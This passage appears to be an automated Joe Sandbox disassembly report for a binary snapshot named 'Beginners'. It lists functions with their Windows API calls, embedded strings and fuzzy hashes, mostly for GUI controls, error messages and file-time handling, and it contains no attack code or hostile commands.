                                          • Opcode Fuzzy Hash: 7d69e9e6188acd13199a3938c84f070669cc152a210c01fbaec99ceecfad5f2f
                                          • Instruction Fuzzy Hash: 80D1B430104702DBCB04EF20C981AEABBB5BF55344F504A1EF499576A3DB71E969CBA2
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 001344AC
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 0013456C
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          • Opcode ID: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
                                          • Instruction ID: 1e671059a93bfda46abb8f792fcd883b007bfc615743756902a95c5dcde6dbd8
                                          • Opcode Fuzzy Hash: d46535c1378aca3f6cf10eb3591685e8726c1d5a1d17663ede608e128111ba60
                                          • Instruction Fuzzy Hash: 0EA15C702143419FCB14EF24C951AAAB7A6EF95314F108969F8969B3E3DB30FD05CB92
                                          APIs
                                          • LoadCursorW.USER32(00000000,00007F89), ref: 001256E1
                                          • LoadCursorW.USER32(00000000,00007F8A), ref: 001256EC
                                          • LoadCursorW.USER32(00000000,00007F00), ref: 001256F7
                                          • LoadCursorW.USER32(00000000,00007F03), ref: 00125702
                                          • LoadCursorW.USER32(00000000,00007F8B), ref: 0012570D
                                          • LoadCursorW.USER32(00000000,00007F01), ref: 00125718
                                          • LoadCursorW.USER32(00000000,00007F81), ref: 00125723
                                          • LoadCursorW.USER32(00000000,00007F88), ref: 0012572E
                                          • LoadCursorW.USER32(00000000,00007F80), ref: 00125739
                                          • LoadCursorW.USER32(00000000,00007F86), ref: 00125744
                                          • LoadCursorW.USER32(00000000,00007F83), ref: 0012574F
                                          • LoadCursorW.USER32(00000000,00007F85), ref: 0012575A
                                          • LoadCursorW.USER32(00000000,00007F82), ref: 00125765
                                          • LoadCursorW.USER32(00000000,00007F84), ref: 00125770
                                          • LoadCursorW.USER32(00000000,00007F04), ref: 0012577B
                                          • LoadCursorW.USER32(00000000,00007F02), ref: 00125786
                                          • GetCursorInfo.USER32(?), ref: 00125796
                                          • GetLastError.KERNEL32(00000001,00000000), ref: 001257C1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Cursor$Load$ErrorInfoLast
                                          • String ID:
                                          • API String ID: 3215588206-0
                                          • Opcode ID: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
                                          • Instruction ID: 4ce20ba93b857e9a3fd92dbcca96db9832952a30df67f4fefea056d57d7d6b3a
                                          • Opcode Fuzzy Hash: 9373d204c97fa4c0ceaf81b659de5b4a29707952d52bdbf90e77d46b463f2db0
                                          • Instruction Fuzzy Hash: C0418570E44319AADB109FBA9C49D6EFFF8EF51B10B10452FE509E7291DBB8A500CE51
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010B17B
                                          • __swprintf.LIBCMT ref: 0010B21C
                                          • _wcscmp.LIBCMT ref: 0010B22F
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0010B284
                                          • _wcscmp.LIBCMT ref: 0010B2C0
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0010B2F7
                                          • GetDlgCtrlID.USER32(?), ref: 0010B349
                                          • GetWindowRect.USER32(?,?), ref: 0010B37F
                                          • GetParent.USER32(?), ref: 0010B39D
                                          • ScreenToClient.USER32(00000000), ref: 0010B3A4
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0010B41E
                                          • _wcscmp.LIBCMT ref: 0010B432
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0010B458
                                          • _wcscmp.LIBCMT ref: 0010B46C
                                            • Part of subcall function 000D385C: _iswctype.LIBCMT ref: 000D3864
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                          • String ID: %s%u
                                          • API String ID: 3744389584-679674701
                                          • Opcode ID: 7ea8163c98a6baa0a37d679f3d212d584cee30680f1230a9e2f3c71874b9e7b9
                                          • Instruction ID: bc8df1b7df84d9cfa7db439256590a9961697ba2ef6e6b451322be3b8aba09f9
                                          • Opcode Fuzzy Hash: 7ea8163c98a6baa0a37d679f3d212d584cee30680f1230a9e2f3c71874b9e7b9
                                          • Instruction Fuzzy Hash: EBA1BE71208306ABD719DF64C8C4BEAB7A8FF48354F108529F9DAC2191DB70EA55CBA1
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0010BAB1
                                          • _wcscmp.LIBCMT ref: 0010BAC2
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0010BAEA
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0010BB07
                                          • _wcscmp.LIBCMT ref: 0010BB25
                                          • _wcsstr.LIBCMT ref: 0010BB36
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0010BB6E
                                          • _wcscmp.LIBCMT ref: 0010BB7E
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0010BBA5
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0010BBEE
                                          • _wcscmp.LIBCMT ref: 0010BBFE
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0010BC26
                                          • GetWindowRect.USER32(00000004,?), ref: 0010BC8F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          • Opcode ID: 6aee3c168e0f29365c170c5984363d17eba119501fa2dd50928a7d8708f7e4a7
                                          • Instruction ID: 7bffe7ccfeb4d004fe51ea8c0b117f521a24c6e98478ac83fed4a654f3cb4c5b
                                          • Opcode Fuzzy Hash: 6aee3c168e0f29365c170c5984363d17eba119501fa2dd50928a7d8708f7e4a7
                                          • Instruction Fuzzy Hash: 7F819B710083099BEB15DF10C9C5FAAB7E8EF44314F04846AFDC99A0E6DBB4D945CB61
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          • Opcode ID: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
                                          • Instruction ID: 619459379ffbaa90423b3f1e95f4e023683377857c930c03e0488cd618743407
                                          • Opcode Fuzzy Hash: 140ef191d3ae2532014c90f31f3f254dbbcbbfcf91b146be690a0efb48a779a1
                                          • Instruction Fuzzy Hash: E1312BB5A48205A6CB04FB50CD83FED73B4AF21350FA00129F581B10D3EFE66E14CA52
                                          APIs
                                          • LoadIconW.USER32(00000063), ref: 0010CBAA
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0010CBBC
                                          • SetWindowTextW.USER32(?,?), ref: 0010CBD3
                                          • GetDlgItem.USER32(?,000003EA), ref: 0010CBE8
                                          • SetWindowTextW.USER32(00000000,?), ref: 0010CBEE
                                          • GetDlgItem.USER32(?,000003E9), ref: 0010CBFE
                                          • SetWindowTextW.USER32(00000000,?), ref: 0010CC04
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0010CC25
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0010CC3F
                                          • GetWindowRect.USER32(?,?), ref: 0010CC48
                                          • SetWindowTextW.USER32(?,?), ref: 0010CCB3
                                          • GetDesktopWindow.USER32 ref: 0010CCB9
                                          • GetWindowRect.USER32(00000000), ref: 0010CCC0
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0010CD0C
                                          • GetClientRect.USER32(?,?), ref: 0010CD19
                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0010CD3E
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0010CD69
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          • Opcode ID: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
                                          • Instruction ID: e55d19ee907eb600c5a17e575217746a305fa21eb6f64706a486bc259ffd954a
                                          • Opcode Fuzzy Hash: 887521d4a08186d9f327e03220e44468fd359ef00fff238ee46f3e474d0ea3a1
                                          • Instruction Fuzzy Hash: C9516071900709EFDB21DFA9CE89B6EBBF5FF08705F000618E686A29A0D774A954CF50
                                          APIs
                                          • _memset.LIBCMT ref: 0013A87E
                                          • DestroyWindow.USER32(00000000,?), ref: 0013A8F8
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0013A972
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0013A994
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013A9A7
                                          • DestroyWindow.USER32(00000000), ref: 0013A9C9
                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,000B0000,00000000), ref: 0013AA00
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0013AA19
                                          • GetDesktopWindow.USER32 ref: 0013AA32
                                          • GetWindowRect.USER32(00000000), ref: 0013AA39
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0013AA51
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0013AA69
                                            • Part of subcall function 000B29AB: GetWindowLongW.USER32(?,000000EB), ref: 000B29BC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$tooltips_class32
                                          • API String ID: 1297703922-3619404913
                                          • Opcode ID: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
                                          • Instruction ID: bf3af075122a60cbd4e35d37d26267429bedc1feb817301a8203f99a79cf17b0
                                          • Opcode Fuzzy Hash: fdbad6964465062554367e2de7ba219994c8cb2fa54f60425e1360ed77f4810c
                                          • Instruction Fuzzy Hash: 9D71A872144200AFD722CF28CC48FAB7BE5EB89304F48051DF98A972A1D731E991DB62
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • DragQueryPoint.SHELL32(?,?), ref: 0013CCCF
                                            • Part of subcall function 0013B1A9: ClientToScreen.USER32(?,?), ref: 0013B1D2
                                            • Part of subcall function 0013B1A9: GetWindowRect.USER32(?,?), ref: 0013B248
                                            • Part of subcall function 0013B1A9: PtInRect.USER32(?,?,0013C6BC), ref: 0013B258
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0013CD38
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0013CD43
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0013CD66
                                          • _wcscat.LIBCMT ref: 0013CD96
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0013CDAD
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0013CDC6
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDDD
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0013CDFF
                                          • DragFinish.SHELL32(?), ref: 0013CE06
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0013CEF9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                          • API String ID: 169749273-3440237614
                                          • Opcode ID: 77c8d85a2325d29a7ee3fe21699c2ad247c67979c1febe502a64dc86f45463b4
                                          • Instruction ID: 7ed67afa7336bc38e483b7d15e9a52fba3603098a9df917ddc75351700383f7f
                                          • Opcode Fuzzy Hash: 77c8d85a2325d29a7ee3fe21699c2ad247c67979c1febe502a64dc86f45463b4
                                          • Instruction Fuzzy Hash: 5C614D71508301AFC711EF64DC85E9FBBF8EF99750F000A2DF695921A2DB709A49CB92
                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 0011831A
                                          • VariantCopy.OLEAUT32(00000000,?), ref: 00118323
                                          • VariantClear.OLEAUT32(00000000), ref: 0011832F
                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0011841D
                                          • __swprintf.LIBCMT ref: 0011844D
                                          • VarR8FromDec.OLEAUT32(?,?), ref: 00118479
                                          • VariantInit.OLEAUT32(?), ref: 0011852A
                                          • SysFreeString.OLEAUT32(?), ref: 001185BE
                                          • VariantClear.OLEAUT32(?), ref: 00118618
                                          • VariantClear.OLEAUT32(?), ref: 00118627
                                          • VariantInit.OLEAUT32(00000000), ref: 00118665
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 3730832054-3931177956
                                          • Opcode ID: 3c5b1e34e2dabe24a9f83854f4a3447df14ec6fa8547d978745170e79e1f542c
                                          • Instruction ID: 94547c8605ab85a44cc2109047defb8d4f3e650c0fa140fb9a6536caa7147aaf
                                          • Opcode Fuzzy Hash: 3c5b1e34e2dabe24a9f83854f4a3447df14ec6fa8547d978745170e79e1f542c
                                          • Instruction Fuzzy Hash: 69D1EF35614215EBCB2C9F65C884BEEB7B4FF05B00F29C569E415AB692DF30D880DBA1
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 00134A61
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00134AAC
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          • Opcode ID: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
                                          • Instruction ID: 22cabc96e590bf51c818d969d94daf902c8aeca45ea3dd36d5bef9aaf077e44b
                                          • Opcode Fuzzy Hash: 5fc5a6818f582f1ebe431b093b7a77cfc126310ccf72f5570d1befe387339548
                                          • Instruction Fuzzy Hash: 42915C342047119FCB04EF20C851AAEB7A2AF94354F11885DF8965B3A3DB31FD4ACB96
                                          APIs
                                          • GetLocalTime.KERNEL32(?), ref: 0011E31F
                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 0011E32F
                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0011E33B
                                          • __wsplitpath.LIBCMT ref: 0011E399
                                          • _wcscat.LIBCMT ref: 0011E3B1
                                          • _wcscat.LIBCMT ref: 0011E3C3
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0011E3D8
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E3EC
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E41E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0011E43F
                                          • _wcscpy.LIBCMT ref: 0011E44B
                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0011E48A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                          • String ID: *.*
                                          • API String ID: 3566783562-438819550
                                          • Opcode ID: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
                                          • Instruction ID: 12d8ca946090ff4fe4756de4bb6e647c7a5a98e483cb6035c3cd219f41570833
                                          • Opcode Fuzzy Hash: b7b943f43cc62efb4bc2b6531a1fc03f5d41316e6beef8cb4f802b9bf1134866
                                          • Instruction Fuzzy Hash: 3E6128755047459FC714EFA0C885ADEB3E8BF89310F04892EF98987252DB35EA85CB92
                                          APIs
                                          • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 0011A2C2
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0011A2E3
                                          • __swprintf.LIBCMT ref: 0011A33C
                                          • __swprintf.LIBCMT ref: 0011A355
                                          • _wprintf.LIBCMT ref: 0011A3FC
                                          • _wprintf.LIBCMT ref: 0011A41A
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: LoadString__swprintf_wprintf$_memmove
                                          • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                          • API String ID: 311963372-3080491070
                                          • Opcode ID: 98f08af6c85d4b9c168d1e5003453d335448d893e3bfcf9e935ec6c003a16a46
                                          • Instruction ID: 3cb8be129e934b2cfd949ff95a49bf60830cdc82ed8b175fc96fa8ce7107a6b2
                                          • Opcode Fuzzy Hash: 98f08af6c85d4b9c168d1e5003453d335448d893e3bfcf9e935ec6c003a16a46
                                          • Instruction Fuzzy Hash: FE51B171900209AACF19EBE0CD46EEEB778EF09340F500169F505B20A3EB316F99CB61
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,000FF8B8,00000001,0000138C,00000001,00000000,00000001,?,00123FF9,00000000), ref: 0011009A
                                          • LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100A3
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • GetModuleHandleW.KERNEL32(00000000,00177310,?,00000FFF,?,?,000FF8B8,00000001,0000138C,00000001,00000000,00000001,?,00123FF9,00000000,00000001), ref: 001100C5
                                          • LoadStringW.USER32(00000000,?,000FF8B8,00000001), ref: 001100C8
                                          • __swprintf.LIBCMT ref: 00110118
                                          • __swprintf.LIBCMT ref: 00110129
                                          • _wprintf.LIBCMT ref: 001101D2
                                          • MessageBoxW.USER32(00000000,?,?,00011010), ref: 001101E9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                          • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                          • API String ID: 984253442-2268648507
                                          • Opcode ID: 969879deed539c83b99977869f5c85e6ab4211d47b9ea42594dcb20a3808acc1
                                          • Instruction ID: 1ad7b79718d04d68622e085e1bba9bf1d45dcbdb55415ab57da3df68f7a3acbf
                                          • Opcode Fuzzy Hash: 969879deed539c83b99977869f5c85e6ab4211d47b9ea42594dcb20a3808acc1
                                          • Instruction Fuzzy Hash: BF416172800219AACF15EBD0CD96EEEB778EF19340F500169F505B2093DB75AF99CB61
                                          APIs
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • CharLowerBuffW.USER32(?,?), ref: 0011AA0E
                                          • GetDriveTypeW.KERNEL32 ref: 0011AA5B
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AAA3
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AADA
                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0011AB08
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
